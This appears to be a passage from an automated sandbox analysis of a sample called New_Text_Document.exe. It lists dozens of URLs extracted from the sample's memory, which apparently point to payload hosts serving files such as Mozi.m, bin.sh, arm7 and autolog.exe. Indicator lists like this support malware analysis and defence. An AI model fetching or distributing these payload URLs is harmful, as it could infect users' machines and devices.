                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.240.79.61:64039/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.11.41:14728/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.148.58:13553/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.15.110:56344/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.15.46:26319/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.185.58:41653/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.210.96:44361/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.214.157:30368/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.57.252:65057/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.60.240:34083/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.60.240:34083/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.60.240:34083/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.64.38:23216/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.241.72.120:49927/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.5.172.65:59217/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.5.172.65:59217/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.106.33.31:62692/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.153.20.102:59977/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.194.46.204:44528/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.218.226.149:50321/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.218.72.72:15470/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.218.74.27:4824/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.234.243.147:2116/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://124.6.14.122:36170/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.130.209.245:3167/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.135.117.116:13732/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.136.171.66:62666/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.136.45.124:2306/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.137.86.48:4570/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.137.86.48:4570/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.139.81.140:28648/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.140.155.29:61114/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.142.81.169:58011/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.150.131.61:13076/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://125.26.22.53/scripts/23s
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.116.212.246:32501/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.134.248.219:47641/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.92.210.156:46915/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.122.98.12:57329/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.204.154.237:3204/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.204.188.137:49566/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.159.133:12347/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.175.56.104/20201117.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.99.204.224:56608/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.216.102.151:38475/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.219.4.166/wp-includes/XXrRaJtiutdHn7N13/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.219.4.166/wp-includes/XXrRaJtiutdHn7N13/?140152
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.192.244.244:30033/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.32.224.7:1350/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.33.30.190:8513/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.36.143.219:30470/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.36.231.220:32868/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.42.209.95:1461/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.43.119.126:14127/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.43.156.33:39860/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.45.208.29:17525/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.45.218.62:5266/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.46.15.246:11334/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.48.149.123:8751/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.50.237.68:7683/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.52.138.39:49052/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.52.211.147:30233/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.54.69.69:16347/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.54.91.154:35591/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.55.75.88:64578/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.186.242.72:55271/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.186.242.72:55271/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.186.242.72:55271/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.10.13
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.10.13/2310/autolog.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.11.22/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/apache2
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/bins.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/cron
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/ftp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.169/ntpd
